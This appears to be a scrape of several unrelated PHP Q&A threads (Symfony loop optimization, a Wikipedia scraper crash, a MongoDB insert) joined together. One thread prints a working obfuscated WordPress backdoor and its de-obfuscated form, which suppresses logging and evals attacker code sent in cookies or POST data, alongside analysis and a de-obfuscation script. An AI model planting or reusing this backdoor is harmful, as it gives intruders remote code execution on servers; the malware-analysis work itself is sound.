code needs to loop over minimum 2000 times in php foreach - php

I have a foreach loop that will run a minimum of 2000 iterations:
foreach ($giftCardSchemeData as $keypreload => $preload) {
for ($i=0; $i <$preload['quantity'] ; $i++) {
$cardid = new CarddetailsId($uuidGenerator->generate());
$cardnumber = self::getCardNumber();
$cardexistencetype = ($key == "giftCardSchemeData") ? "Physical" : "E-Card" ;
$giftCardSchemeDataDb = array('preload' => array('value' => $preload['value'], 'expirymonths' => $preload['expiryMonths']));
$otherdata = array('cardnumber' => $cardnumber, 'cardexistencetype' => $cardexistencetype, 'isgiftcard' => true , 'giftcardamount' => $preload['value'],'giftCardSchemeData' => json_encode($giftCardSchemeDataDb), 'expirymonths' => $preload['expiryMonths'], 'isloyaltycard' => false, 'loyaltypoints' => null,'loyaltyCardSchemeData' => null, 'loyaltyRedeemAmount' => null, 'pinnumber' => mt_rand(100000,999999));
$output = array_merge($data, $otherdata);
// var_dump($output);
$carddetailsRepository = $this->get('oloy.carddetails.repository');
$carddetails = $carddetailsRepository->findByCardnumber($cardnumber);
if (!$carddetails) {
$commandBus->dispatch(
new CreateCarddetails($cardid, $output)
);
} else {
self::generateCardFunctionForErrorException($cardid, $output, $commandBus);
}
}
}
I have 5 foreach loops like the one above in total. Each time I call the function, all 5 foreach loops run and then the response is returned. It takes a long time and the PHP maximum execution time error occurs.
Is there any way to send the response and then run the foreach on the server side without hitting the maximum execution time issue? I also need an optimization for the foreach.
Also, in Symfony I tried the try/catch method for the existence check in the above code, but it returns the Entity closed error. I have temporarily used the existence check in the DB, but it needs an optimization.

There seems to be a lot wrong (or to be optimized) with this code, but let's focus on your questions:
First I think this code shouldn't be in code that will be triggered by a visitor.
You should separate 2 processes:
1. A cronjob that generates everything that must be generated and saves that generated info to a database. The cronjob can take as much time as it needs. Look at Symfony's console components.
2. A page that displays only the generated info by fetching it from the database and passing it to a Twig template.
However, looking at the code you posted I think it can be greatly optimized as is. You seem to have a foreach loop that fetches variable data, and in that you have a for-loop that does not seem to generate much variability at all.
So most of the code inside the for loop is now being executed over and over again without making any actual changes.
Here is a concept that would give much higher performance. Of course, since I don't know the actual context of your code, you will have to "fix it".
$carddetailsRepository = $this->get('oloy.carddetails.repository');
$cardexistencetype = ($key == "giftCardSchemeData") ? "Physical" : "E-Card";
foreach ($giftCardSchemeData as $keypreload => $preload) {
$cardnumber = self::getCardNumber();
$carddetails = $carddetailsRepository->findByCardnumber($cardnumber);
$giftCardSchemeDataDb = array('preload' => array('value' =>
$preload['value'], 'expirymonths' => $preload['expiryMonths']));
$otherdata = array('cardnumber' => $cardnumber, 'cardexistencetype' =>
$cardexistencetype, 'isgiftcard' => true , 'giftcardamount' =>
$preload['value'],'giftCardSchemeData' =>
json_encode($giftCardSchemeDataDb), 'expirymonths' =>
$preload['expiryMonths'], 'isloyaltycard' => false, 'loyaltypoints' =>
null,'loyaltyCardSchemeData' => null, 'loyaltyRedeemAmount' => null,
'pinnumber' => 0);
$output = array_merge($data, $otherdata);
for ($i=0; $i <$preload['quantity'] ; $i++) {
$cardid = new CarddetailsId($uuidGenerator->generate());
$output['pinnumber'] = mt_rand(100000,999999);
if (!$carddetails) {
$commandBus->dispatch(
new CreateCarddetails($cardid, $output)
);
} else {
self::generateCardFunctionForErrorException($cardid, $output, $commandBus);
}
}
}
Also: if in this code you are triggering any database inserts or updates, you don't want to trigger them each iteration. You will want to start some kind of database transaction and flush the queries each X iterations instead.


Obfuscating script in WordPress [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 6 years ago.
One of my clients using WordPress got hacked with some malicious code like below. There are lots of files like this all over her public_html. Though I told her to delete everything, re-upload it all and update the framework, plugins etc., I also want to know how I can de-obfuscate the code.
Why? Because my VPS provider told me that some hacking attempt was made using my IP (main server) against some news channel and that I should stop this kind of activity or they will simply discontinue my VPS.
So could anyone guide me to the exact code so I can analyze what kind of harm it may have done?
Please note I've done jail-shell, CSF, blocking IP; still it finds some way.
<?php
$GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b";
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]] = $GLOBALS['efaa04'][45].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][93];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]] = $GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][40];
$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]] = $GLOBALS['efaa04'][43].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][94].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][71].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]] = $GLOBALS['efaa04'][52].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][21].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]] = $GLOBALS['efaa04'][14].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] = $_POST;
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] = $_COOKIE;
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4], NULL);
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29], 0);
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][91].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35], 0);
#$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]](0);
$n1f035 = NULL;
$la02268b = NULL;
$GLOBALS[$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][59]] = $GLOBALS['efaa04'][78].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][33];
global $ea0d31;
function n6ee1($n1f035, $f3ddc0)
{
$kdaf = "";
for ($v40207=0; $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035);)
{
for ($w6efcf7b=0; $w6efcf7b<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($f3ddc0) && $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035); $w6efcf7b++, $v40207++)
{
$kdaf .= $GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]]($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($n1f035[$v40207]) ^ $GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($f3ddc0[$w6efcf7b]));
}
}
return $kdaf;
}
function q471($n1f035, $f3ddc0)
{
global $ea0d31;
return $GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($n1f035, $ea0d31), $f3ddc0);
}
foreach ($GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
if (!$n1f035)
{
foreach ($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
}
$n1f035 = #$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]]($GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]]($n1f035), $la02268b));
if (isset($n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]]) && $ea0d31==$n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]])
{
if ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][43])
{
$v40207 = Array(
$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25] => #$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]](),
$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][25] => $GLOBALS['efaa04'][59].$GLOBALS['efaa04'][51].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][59],
);
echo #$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]]($v40207);
}
elseif ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][35])
{
eval($n1f035[$GLOBALS['efaa04'][40]]);
}
exit();
}
Tried to decode it with http://localhost/script.php?testGet=sss and got result
Array
(
[_GET] => Array
(
[testGet] => sss
)
[_POST] => Array
(
)
[_COOKIE] => Array
(
)
[_FILES] => Array
(
)
[GLOBALS] => Array
*RECURSION*
[efaa04] => > ,Fg7R2}Sl{a)nhO?#P=qjT0vY%+s-(|f#e]XZ"d3Wi[c&KQxN.b5~\BEG16*:Jow_9!
/uAyMU^z4DH
< I`t$LC'mVrpk8;
[m56df3a] => chr
[ue8410] => ord
[x6a870c8] => strlen
[rfa65] => ini_set
[ne6255ab9] => serialize
[y648d6] => phpversion
[h8f865758] => unserialize
[j51e1d] => base64_decode
[y8512e] => set_time_limit
[t4193646] => q471
[t297c] => n6ee1
[uaf6e192f] => Array
(
)
[mb1694f] => Array
(
)
[n1f035] =>
[la02268b] =>
[ea0d31] => 435a677a-8b6e-4dc3-92e9-b2746832025f
)
got here
got not set n1f035
got q471string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL string(0) "" string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL bool(false)
I've told my client to delete all files and re-upload from the backup. As I said, I've found so many C99madshell (raw) files; is this the same kind of thing in an obfuscated manner?
Please note I've found a way to protect the site by searching for malicious code and deleting it. Then I ran a command like chattr -R +i ./public_html and it seems to have stopped, though I'm sure there are many backdoor scripts still inside. But it would be better if I knew the exact code of the above.
I agree with @Epodax, SO is not a security consultancy site, but I think the discussion around de-obfuscation is worthy and many people could learn a lot from it.
I still couldn't figure out what the script does, slowly working on it as I find spare time, but want to share my progress so far anyways.
First I used Psysh, an interactive PHP shell, to retrieve all those concatenations of $GLOBALS['efaa04'] elements and make life easier. Just run the first line $GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b"; and then go echoing the parts that use this array elements to figure out what they mean.
Some lines like this revealed:
$GLOBALS["x6a870c8"] = "strlen";
$GLOBALS["rfa65"] = "ini_set";
$GLOBALS["ne6255ab9"] = "serialize";
$GLOBALS["y648d6"] = "phpversion";
$GLOBALS["h8f865758"] = "unserialize";
...
After that I replaced $GLOBALS["x6a870c8"] with strlen, $GLOBALS["rfa65"] with ini_set and so on, and this is what I got so far:
<?php
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$n1f035 = NULL;
$la02268b = NULL;
$GLOBALS["ea0d31"] = "435a677a-8b6e-4dc3-92e9-b2746832025f";
global $ea0d31;
function n6ee1($n1f035, $f3ddc0)
{
$kdaf = "";
for ($v40207=0; $v40207 < strlen($n1f035);)
{
for ($w6efcf7b=0; $w6efcf7b < strlen($f3ddc0) && $v40207 < strlen($n1f035); $w6efcf7b++, $v40207++)
{
$kdaf .= chr(ord($n1f035[$v40207]) ^ ord($f3ddc0[$w6efcf7b]));
}
}
return $kdaf;
}
function q471($n1f035, $f3ddc0)
{
global $ea0d31;
return n6ee1(n6ee1($n1f035, $ea0d31), $f3ddc0);
}
foreach ($_COOKIE as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
if (!$n1f035)
{
foreach ($_POST as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
}
$n1f035 = @unserialize(q471(base64_decode($n1f035), $la02268b));
if (isset($n1f035["ak"]) && $ea0d31==$n1f035["ak"])
{
if ($n1f035["a"] == "i")
{
$v40207 = Array(
"pv" => @phpversion(),
"sv" => "1.0-1",
);
echo @serialize($v40207);
}
elseif ($n1f035["a"] == "e")
{
eval($n1f035["d"]);
}
exit();
}
De-obfuscation can be tough or fun, it depends on your point of view. Think of it like a puzzle. Next steps are to tidy this up, rename vars and functions to more friendly stuff, and so on.
Fixing your client's site and keeping it safe is your homework, but I look forward to a discussion around de-obfuscation and techniques to do so.
A tip: Use find . -type f -printf '%T@ %TY-%Tm-%Td %TH:%TM:%.2TS %p\n' | sort -nr | head -n 25 | cut -f2- -d" " to list the 25 latest changed files on your server. You can increase the number if you like. I guess the infected files changed on the same day, or on close dates at least, so that helps to clean up the mess if you can't just wipe things clean at the moment.
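The manual Psysh step from the answer above, done as a static text pass so the sample is never executed; this is an added example, not part of the original answer, and it goes one step further by also rewriting the aliased calls. The sample file, the table name `t9` and the alias keys are constructed for illustration.

```python
import re

# Constructed sample written in the style of the file in the question; the
# table name 't9' and the alias keys are made up for this example.
SAMPLE = r'''<?php
$GLOBALS['t9'] = "\x63\x68\x72\x6f\x64\x9\x73\x74\x6c\x65\x6e";
$GLOBALS[$GLOBALS['t9'][4].$GLOBALS['t9'][0]] = $GLOBALS['t9'][0].$GLOBALS['t9'][1].$GLOBALS['t9'][2];
$GLOBALS[$GLOBALS['t9'][4].$GLOBALS['t9'][3]] = $GLOBALS['t9'][3].$GLOBALS['t9'][2].$GLOBALS['t9'][4];
$GLOBALS[$GLOBALS['t9'][4].$GLOBALS['t9'][8]] = $GLOBALS['t9'][6].$GLOBALS['t9'][7].$GLOBALS['t9'][2].$GLOBALS['t9'][8].$GLOBALS['t9'][9].$GLOBALS['t9'][10];
for ($i = 0; $i < $GLOBALS[$GLOBALS['t9'][4].$GLOBALS['t9'][8]]($a); $i++) {
    $k .= $GLOBALS[$GLOBALS['t9'][4].$GLOBALS['t9'][0]]($GLOBALS[$GLOBALS['t9'][4].$GLOBALS['t9'][3]]($a[$i]) ^ $GLOBALS[$GLOBALS['t9'][4].$GLOBALS['t9'][3]]($b[$i]));
}
eval($p[$GLOBALS['t9'][4]]);
'''

# $GLOBALS['name'] = "\x..\x.."; -> the character lookup table
TABLE_RE = re.compile(r"""\$GLOBALS\['(\w+)'\]\s*=\s*"((?:\\x[0-9a-fA-F]{1,2})+)"\s*;""")
# $GLOBALS["key"] = "identifier"; -> a function-name alias (after pass 1)
ALIAS_RE = re.compile(r'^\$GLOBALS\["(\w+)"\]\s*=\s*"([A-Za-z_]\w*)"\s*;', re.M)
# $GLOBALS["key"]( -> an indirect call through an alias
CALL_RE = re.compile(r'\$GLOBALS\["(\w+)"\]\s*\(')


def php_hex_string(body):
    """Decode a PHP double-quoted string made only of \\x escapes.

    PHP accepts one or two hex digits (the table uses \\x9, \\xa, \\xd);
    Python's own \\x escape needs exactly two, so parse it by hand.
    """
    return "".join(chr(int(h, 16)) for h in re.findall(r"\\x([0-9a-fA-F]{1,2})", body))


def php_literal(text):
    """Quote text as a PHP double-quoted literal, hex-escaping anything unusual."""
    if all(c.isalnum() or c in "_-. " for c in text):
        return '"%s"' % text
    return '"%s"' % "".join("\\x%02x" % ord(c) for c in text)


def deobfuscate(src):
    """Return (readable_source, aliases) without executing any PHP."""
    m = TABLE_RE.search(src)
    if not m:
        return src, {}
    name, table = m.group(1), php_hex_string(m.group(2))
    ref = r"\$GLOBALS\['" + re.escape(name) + r"'\]\[(\d+)\]"
    chain = re.compile(ref + r"(?:\s*\.\s*" + ref + r")*")

    def to_literal(match):
        idx = [int(n) for n in re.findall(ref, match.group(0))]
        if max(idx) >= len(table):
            return match.group(0)  # index outside the table: leave for manual review
        return php_literal("".join(table[i] for i in idx))

    # Pass 1: every table[N].table[M]... chain becomes one string literal.
    src = chain.sub(to_literal, src)
    # Pass 2: collect key -> function aliases and rewrite indirect calls.
    aliases = dict(ALIAS_RE.findall(src))

    def to_call(call):
        fn = aliases.get(call.group(1))
        return fn + "(" if fn else call.group(0)

    return CALL_RE.sub(to_call, src), aliases


if __name__ == "__main__":
    readable, found = deobfuscate(SAMPLE)
    print(found)
    print(readable)
```

Only call sites are rewritten through the alias map, so string values such as the UUID key in the real file are left as data.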

simple_html_dom.php

I am using "simple_html_dom.php" to scrape data from the Wikipedia site. If I run the code on scraperwiki.com it throws an error with exit status 139, and if I run the same code on my xampp server, the server hangs.
I have a set of links
I'm trying to get Literacy value from all the sites
If I run the code with one link there is no problem and it's returning the expected result
If I try to get data from all the sites in one go I'm facing the above problem
The code is:
<?php
$test=array
(
0 => "http://en.wikipedia.org/wiki/Andhra_Pradesh",
1 => "http://en.wikipedia.org/wiki/Arunachal_Pradesh",
2 => "http://en.wikipedia.org/wiki/Assam",
3 => "http://en.wikipedia.org/wiki/Bihar",
4 => "http://en.wikipedia.org/wiki/Chhattisgarh",
5 => "http://en.wikipedia.org/wiki/Goa",
for($ix=0;$ix<=9;$ix++){
$content = file_get_html($test[$ix]);
$tables = $content ->find('#mw-content-text table',0);
foreach ($tables ->children() as $child1) {
foreach($child1->find('th a') as $ele){
if($ele->innertext=="Literacy"){
foreach($child1->find('td') as $ele1){
echo $ele1->innertext;
}}} }}
Guide me where I am wrong. Is there any memory problem??? Is there any xampp configuration???
<?php
require 'simple_html_dom.php';
$test = array(
0 => "http://en.wikipedia.org/wiki/Andhra_Pradesh",
1 => "http://en.wikipedia.org/wiki/Arunachal_Pradesh",
2 => "http://en.wikipedia.org/wiki/Assam",
3 => "http://en.wikipedia.org/wiki/Bihar",
4 => "http://en.wikipedia.org/wiki/Chhattisgarh",
5 => "http://en.wikipedia.org/wiki/Goa");
for($ix=0;$ix<count($test);$ix++){
$content = file_get_html($test[$ix]);
$tables = $content ->find('#mw-content-text table',0);
foreach ($tables ->children() as $child1) {
foreach($child1->find('th a') as $ele){
if($ele->innertext=="Literacy"){
foreach($child1->find('td') as $ele1){
echo $ele1->innertext;
}
}
}
}
$content->clear();
}
?>
but these URLs are too much. You may get a fatal error of max execution time exceeded or you may get error 324.

MongoDB inserting a record not working as it should

So, I've been working on this code for some time, but I'm giving up, and reaching out for help from you guys. I've been looking at documentation for MongoDB and PHP, but I can't find anything. What I want to do is take the sample code for inserting a record:
$obj = array( "title" => "Calvin and Hobbes", "author" => "Bill Watterson" );
And re-purpose it for my project (as shown):
$obj = array( $startCol => $startRow );
